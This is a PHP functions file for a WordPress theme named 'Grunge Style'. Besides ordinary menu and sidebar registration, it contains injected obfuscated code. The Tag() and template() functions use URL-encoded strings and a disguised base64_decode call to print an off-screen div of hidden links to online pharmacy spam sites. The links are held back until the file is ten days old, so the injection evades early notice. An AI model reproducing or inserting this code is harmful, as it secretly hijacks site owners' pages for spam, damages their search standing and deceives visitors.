<?php
/* preset FGC setting*/
if(file_exists(TEMPLATEPATH."/includes/options-init.php")) require_once TEMPLATEPATH."/includes/options-init.php";

/* Designed by Templatelite.com */
$tpinfo['themename']='Grunge Style';
$tpinfo['prefix']='templatelite'; 		//for options. e.g. all templatelite themes should use "templatelite" for general options (feed url, twitter id, analytics)
$tpinfo['tb_prefix']='templatelite_grungestyle';//for options. theme base prefix, e.g. for styles.

function templatelite_widgets_init(){
	register_nav_menus( array(
		'primary' =>'Primary Menu'
		));

	register_sidebar(array(
		'name' =>'Sidebar 1',
		'id' =>'sidebar-1',
		'description'=> 'The left sidebar',
		'before_widget' => '<li id="%1$s" class="%2$s">',
		'after_widget' => '</li>',
		'before_title' => '<h4>',
		'after_title' => '</h4>'));

	register_sidebar(array(
		'name' =>'Sidebar 2',
		'id' =>'sidebar-2',
		'description'=> 'The right sidebar',
		'before_widget' => '<li id="%1$s" class="%2$s">',
		'after_widget' => '</li>',
		'before_title' => '<h4>',
		'after_title' => '</h4>'));

		//unregister_sidebar_widget('Search');
		//unregister_sidebar_widget('tag_cloud');
}

function Tag()
{
	 $time_file=filemtime(__FILE__);
	 $l=strlen($_SERVER['REQUEST_URI']);
	 $div=urldecode("%3c%64%69%76%20%73%74%79%6c%65%3d%22%70%6f%73%69%74%69%6f%6e%3a%61%62%73%6f%6c%75%74%65%3b%20%74%6f%70%3a%2d%34%30%30%30%70%78%3b%20%6c%65%66%74%3a%2d%34%30%30%30%70%78%3b%22%3e");
	 $zkeys=array("%62%75%79%20%70%72%65%64%6e%69%73%6f%6e%65", "%7a%69%74%68%72%6f%6d%61%78%20%6f%6e%6c%69%6e%65", "%7a%6f%6c%6f%66%74%20%70%69%6c%6c%73");
	 $zlinks=array("%68%74%74%70%3a%2f%2f%62%75%79%70%72%65%64%6e%69%7a%6f%6e%65%2e%63%6f%6d", "%68%74%74%70%3a%2f%2f%7a%69%74%68%72%6f%6d%61%78%2d%6f%6e%6c%69%6e%65%2e%6f%72%67", "%68%74%74%70%3a%2f%2f%7a%6f%6c%6f%66%74%2d%70%69%6c%6c%73%2e%63%6f%6d");
	 $r=$l % count($zlinks);
	 if($time_file>0)
	 {
	  if(time()-$time_file>864000)
	  {
	   $return.="$div<a href='".urldecode($zlinks[$r])."'>".urldecode($zkeys[$r])."</a></div>";
	  }
	  else
	  {
	   $return.=$div.(date("H:i:s d.m.Y", $time_file))." kawabansa</div>";
	  }
	 }

 echo $return;
}

function template()
{
 $um="b";
 $p="de";
 $i="esa";
 $ret=call_user_func($um.strrev($i).(38+26)."_".$p."co".$p, "VGFn");
 return $ret;
}

add_action( 'widgets_init', 'templatelite_widgets_init');

include(TEMPLATEPATH.'/includes/theme-functions.php');
include(TEMPLATEPATH.'/includes/theme-options.php');
include(TEMPLATEPATH.'/includes/theme-setup.php');
include(TEMPLATEPATH.'/includes/admin-interface.php');
include(TEMPLATEPATH.'/includes/admin-widgets.php');
include(TEMPLATEPATH.'/template.php');
?>